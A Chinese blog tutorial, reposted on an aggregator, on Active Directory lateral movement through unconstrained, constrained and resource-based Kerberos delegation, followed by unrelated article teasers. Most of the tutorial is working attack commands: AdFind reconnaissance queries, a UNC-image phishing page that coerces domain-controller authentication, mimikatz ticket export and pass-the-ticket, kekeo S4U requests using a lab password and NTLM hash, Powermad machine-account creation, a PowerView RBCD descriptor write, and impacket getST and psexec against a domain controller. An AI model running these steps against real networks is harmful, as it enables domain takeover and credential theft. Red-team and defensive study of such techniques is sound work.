内网渗透之横向移动 委派-非约束委派约束委派资源委派

news2024/11/24 14:24:37

0x01 横向移动-非约束委派

原理:
机器A(域控)访问具有非约束委派权限的机器B的服务,会把当前认证用户(域管用户)的的TGT放在ST票据中,一起发送给机器B,机器B会把TGT存储在lsass进程中以备下次重用。从而机器B就能使用这个TGT模拟认证用户(域管用户)访问服务
利用场景
攻击者拿到了一台配置非约束委派的机器权限,可以诱导域管来访问该机器,然后得到管理员的TGT,从而模拟域管用户,利用方式和ptt类似(需要有票据)

复现配置:
环境:god.org
1.信任此计算机来委派任何服务
在这里插入图片描述
2.setspn -U -A priv/test webadmin
在这里插入图片描述
准备:
werserver上线cs
进行提权

判断查询:
有主机名和用户账号设置了非约束才可以使用
查询域内设置了非约束委派的服务账户:

AdFind -b "DC=god,DC=org" -f "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))" dn

查询域内设置了非约束委派的机器账户:

AdFind -b "DC=god,DC=org" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" dn

在这里插入图片描述

利用:
1.域控与委派机器通讯
主动:

net use \\webserver

钓鱼:
http://192.168.3.31/31.html

<!DOCTYPE html>
<html>
<head>
  <title></title>
</head>
<body>
  <img src="file:///\\192.168.3.31\2">
</body>
</html>

2.导出票据到本地

mimikatz sekurlsa::tickets /export

在这里插入图片描述
3.导入票据到内存

mimikatz kerberos::ptt [0;e949e]-2-0-60a00000-Administrator@krbtgt-GOD.ORG.kirbi

在这里插入图片描述
4.连接域控

dir \\owa2010cn-god\c$

在这里插入图片描述

0x02 内网横向移动-约束委派
原理:
由于非约束委派的不安全性,微软在windows server 2003中引入了约束委派,对Kerberos协议进行了拓展,
引入了SService for User to Self (S4U2Self)和 Service for User to Proxy (S4U2proxy)。

利用场景:
如果攻击者控制了服务A的账号,并且服务A配置了到域控的CIFS服务的约束性委派
则攻击者可以先使用S4u2seflt申请域管用户(administrator)访问A服务的ST1,
然后使用S4u2Proxy以administrator身份访问域控的CIFS服务,即相当于控制了域控

复现配置:
1.机器设置仅信任此计算机指定服务-cifs
在这里插入图片描述
2.用户设置仅信任此计算机指定服务-cifs
在这里插入图片描述
用户名和机器名都配置成owa的账号
准备:
werserver上线cs
进行提权

判断查询:
查询机器用户(主机)配置约束委派

AdFind -b "DC=god,DC=org" -f "(&(samAccountType=805306369)(msds-allowedtodelegateto=*))" msds-allowedtodelegateto

查询服务账户(主机)配置约束委派

AdFind -b "DC=god,DC=org" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" msds-allowedtodelegateto

在这里插入图片描述

利用步骤:
1.获取用户的票据
明文

shell kekeo "tgt::ask /user:webadmin /domain:god.org /password::admin!@#45 /ticket:administrator.kirbi" "exit"

ntml hash值

shell  kekeo "tgt::ask /user:webadmin /domain:god.org /NTLM:518b98ad4178a53695dc997aa02d455c /ticket:administrator.kirbi" "exit"

2.利用用户票据获取域控票据
选用一个服务即可,上方第一个查询返回的值

shell  kekeo "tgs::s4u /tgt:TGT_webadmin@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi /user:Administrator@god.org /service:cifs/owa2010cn-god" "exit"

在这里插入图片描述

shell  kekeo "tgs::s4u /tgt:TGT_webadmin@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi /user:Administrator@god.org /service:cifs/owa2010cn-god.god.org" "exit"

3.导入票据到内存

mimikatz kerberos::ptt TGS_Administrator@god.org@GOD.ORG_cifs~owa2010cn-god@GOD.ORG

4.连接域控

shell dir \\owa2010cn-god.god.org\c$

在这里插入图片描述

0x03横向移动-资源委派

基于资源的约束委派(RBCD)是在Windows Server 2012中新加入的功能,与传统的约束委派相比,它不再需要域管理员权限去设置相关属性。RBCD把设置委派的权限赋予了机器自身,既机器自己可以决定谁可以被委派来控制我。也就是说机器自身可以直接在自己账户上配置msDS-AllowedToActOnBehalfOfOtherIdentity属性来设置RBCD。

计算机加⼊域时,加⼊域的域⽤户被控后也将导致使用当前域用户加入的计算机受控。(利用域用户加域的计算机)

条件:
1.域控Windows2012及以上
2.存在域内成员用户加入域操作
工具:
sid2user
Powermad
impacket
环境:
win7
win2008
win2012

1.获取受害目标:有哪些域内计算机存在同一用户加入的,必须有sid值一致的才能进行攻击

AdFind.exe -h 192.168.3.33 -b "DC=xiaodi,DC=local" -f "objectClass=computer" mS-DS-CreatorSID

在这里插入图片描述
判断受害用户:

sid2user.exe \\192.168.3.33 5 21 1695257952 3088263962 2055235443 1104

在这里插入图片描述

2.增加机器:
powershell

Set-ExecutionPolicy Bypass -Scope Process
Import-Module .\Powermad.ps1
New-MachineAccount -MachineAccount serviceA -Password $(ConvertTo-SecureString "123456" -AsPlainText -Force)

获取sid:

Import-Module .\PowerView.ps1
Get-NetComputer serviceA -Properties objectsid
获取到的sid值
S-1-5-21-1695257952-3088263962-2055235443-1602

在这里插入图片描述

3.设置修改属性
powershell

Set-ExecutionPolicy Bypass -Scope Process
import-module .\powerview.ps1
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1695257952-3088263962-2055235443-1107)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer DATA| Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose

在这里插入图片描述
验证修改是否成功:

Get-DomainComputer DATA -Properties msds-allowedtoactonbehalfofotheridentity

在这里插入图片描述
清除修改设置:

Set-DomainObject DATA -Clear 'msds-allowedtoactonbehalfofotheridentity' -Verbose

4.连接目标获取票据:

python getST.py -dc-ip 192.168.3.33 xiaodi.local/serviceA\$:123456 -spn cifs/data.xiaodi.local -impersonate administrator

在这里插入图片描述
5.导入票据到内存:

mimikatz kerberos::ptc administrator.ccache

在这里插入图片描述
6.连接利用票据:

dir \\data.xiaodi.local\c$
python psexec.py -k xiaodi.local/administrator@data.xiaodi.local -no-pass

在这里插入图片描述
关于 getST.py报错:
在这里插入图片描述
进入到impaket的包里

python setup.py install

python 应该是有版本限制的3.8,3.9
3.10版本是不行的,再就是直接安装impacket也会出错,所以使用上面的方法安装

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/498871.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

tomcat乱码解决方案

2.将里面的java.util.logging.ConsoleHandler.encoding 的值改为GBK。如下图&#xff1a;

电影推荐算法

模型训练 下载数据集&#xff0c;解压到项目目录下的./ml-1m文件夹下。数据集分用户数据users.dat、电影数据movies.dat和评分数据ratings.dat。 ** 数据集分析 ** user.dat&#xff1a;分别有用户ID、性别、年龄、职业ID和邮编等字段。 数据集网站地址为http://files.group…

数智未来,因你而来 | 昇腾AI创新大赛2023全新启动

在5月6日-7日举行的昇腾AI开发者峰会2023上&#xff0c;昇腾AI创新大赛2023正式启动。大赛旨在鼓励全产业开发者基于昇腾AI技术和产品&#xff0c;打造软/硬件解决方案、探索模型算法&#xff0c;加速AI与行业融合&#xff0c;促进开发者能力提升。 会上&#xff0c;中国工程院…

【vite+vue3.2 项目性能优化实战】使用vite-plugin-cdn-import进行CDN加速优化项目体积

CDN&#xff08;Content Delivery Network&#xff09;即内容分发网络&#xff0c;是一种通过在全球范围内分布式部署服务器来加速网络内容传输的技术。CDN加速的原理是&#xff0c;当用户请求访问某个资源时&#xff0c;CDN会根据用户的地理位置和网络状况&#xff0c;自动选择…

【内置函数】——高级编程——如桃花来

目录索引 1. hasattr()&#xff1a;2. getattr()&#xff1a;有&#xff1a;没有则报错&#xff1a; 3. setattr()&#xff1a;4. delattr():5. issubclass():6. isinstance():判断前面是不是属于后面的类型&#xff1a;判断前面是不是属于后面的类型之一&#xff1a;判断前面是…

百度网盘密码数据兼容处理

文章目录 一、问题描述二、代码实现1. 配置类2. 数据库配置3. config 配置类4. AOP 通知类5. 数据层6. 业务层7. 实体类 三、测试及结果 一、问题描述 需求&#xff1a; 对百度网盘分享链接输入密码时尾部多输入的空格做兼容处理。 分析&#xff1a; ① 在业务方法执行之前对所…

目标检测YOLO(V1、V2、V3)入门

one-stage和two-stage的区别 YOLO常见的指标 YOLO V1 yolo v1架构解读 yolo v1损失函数 NMS非极大值抑制 yolo v1版本的问题 重叠在一起的物体不好分类&#xff0c;只是一个单分类问题多标签问题&#xff08;狗和哈士奇&#xff09; v2和v1的区别 v2网络结构 batch normaliz…

【iOS】---pthread,NSThread

在iOS中多线程开发有四种方式&#xff0c;在之前我们浅浅了解了一下GCD&#xff0c;这期来看看pthread和NSThread pehread pthread简介 pthread 是一套通用的多线程的 API&#xff0c;可以在Unix / Linux / Windows 等系统跨平台使用&#xff0c;使用 C 语言编写&#xff0c;…

Redis持久化之RDB高频问题

1、RDB是如何应用的&#xff1f; 因为记录的是操作命令&#xff0c;而不是实际的数据&#xff0c;所以&#xff0c;用 AOF 方法进行故障恢复的时候&#xff0c;需要逐一把操作日志都执行一遍。如果操作日志非常多&#xff0c;Redis 就会恢复得很缓慢&#xff0c;影响到正常使用…

ApacheBench网站压力测试

ApacheBench &#xff08;简称ab&#xff09;是一个指令列程式&#xff0c;可用于网站压力测试&#xff0c;亦可用于发起CC攻击&#xff0c;请不要滥用哦。ApacheBench &#xff08;简称ab&#xff09;是一个指令列程式&#xff0c;可用于网站压力测试。如果已经安装过Apache&a…

Linux基本指令----上

Linux基本指令----上 ls指令pwd指令cd指令touch指令mkdir指令rmdir指令&&rm指令man指令cp指令mv指令cat指令echo指令more指令less指令head指令tail指令结语 ls指令 语法&#xff1a; ls [选项] [目录或文件] 功能&#xff1a; 对于目录&#xff0c;该命令列出该目录下…

Spring Boot集成ShardingSphere实现按月数据分片及创建自定义分片算法 | Spring Cloud 44

一、前言 在前面我们通过以下章节对数据分片有了基础的了解&#xff1a; Spring Boot集成ShardingSphere实现数据分片&#xff08;一&#xff09; | Spring Cloud 40 Spring Boot集成ShardingSphere实现数据分片&#xff08;二&#xff09; | Spring Cloud 41 Spring Boot集…

【Windows】高效的本地文件搜索工具《Everything》

&#x1f433;好用高效的本地文件搜索工具《Everything》 &#x1f9ca;一、什么是Everything&#x1f9ca;二、为什么选择Everything&#x1f9ca;三、下载Everything&#x1f9ca;四、Everything为什么高效 &#x1f9ca;一、什么是Everything Everything是一个运行于Window…

单片机GD32F303RCT6 (Macos环境)开发 (五)—— IAP代码架构工程

IAP代码架构工程 1、IAP一般分两个工程&#xff0c;一个Bootloader工程&#xff0c;一个Application工程。 这两个工程的差异后面会讲。 IAP架构工程的好处在于产品上线以后&#xff0c;想要升级的话&#xff0c;不用借助烧录器&#xff0c;就可以完成产品的软件升级。 2、Boo…

轻量级团队协作工具推荐,提高效率从选择开始

首先不得不夸一句&#xff1a;爱用Zoho工具的人&#xff0c;都十分自律和高效&#xff0c;因为Zoho旗下有多种简单好用的团队协作工具。 1、Zoho Projects项目管理工具 项目任务进度和团队沟通与协作管理软件Zoho Projects是一款基于web的软件。专为团队协作而设计&#xff0c;…

手写卡尔曼滤波

形象图 里面的my_Kalman.ipynb 和ppt就是了&#xff0c;其他的是原始资料和 辅助函数 链接&#xff1a;https://pan.baidu.com/s/1J1nA–oqoj8OvgbrA3LfbQ?pwd1264 提取码&#xff1a;1264 import numpy as np import matplotlib.pyplot as plt from matplotlib.animation i…

物理验证LVS对bulk(体)的理解和处理技巧

对于物理验证中的LVS&#xff0c;需要对各种物理器件进行SpiceVsGDS的比对&#xff0c;基于现在流行的std-cell的库的设计方法&#xff0c;LVS需要对CMOS器件多相应的处理&#xff0c;这里会涉及到一些具体的物理库的知识和小的技巧&#xff0c;这里结合具体的物理设计和CDL形态…

网络安全战略:如何应对不断变化的威胁环境?

网络安全一直是大家所关注的重点。在如今的数字化时代&#xff0c;网络安全问题日益严峻&#xff0c;网络攻击者使用更加复杂和高级的攻击方式&#xff0c;企图从各种角度入侵和危害我们的计算机网络。因此&#xff0c;我们必须制定一套完善的网络安全战略&#xff0c;以便更好…

LeetCode 牛客单链表OJ题目分享

目录 链表的回文结构相交链表环形链表I环形链表II 链表的回文结构 链接: link 题目描述&#xff1a; 题目思路&#xff1a; 本题思路是找到每一条链表的中间节点&#xff0c;之后逆置中间节点之后的链表&#xff0c;定义两个指针&#xff0c;分别指向逆置后链表的头部的链表的…

8年资深测试总结,性能测试基础知识(大全)你的进阶之路...

目录&#xff1a;导读 前言一、Python编程入门到精通二、接口自动化项目实战三、Web自动化项目实战四、App自动化项目实战五、一线大厂简历六、测试开发DevOps体系七、常用自动化测试工具八、JMeter性能测试九、总结&#xff08;尾部小惊喜&#xff09; 前言 性能测试&#xf…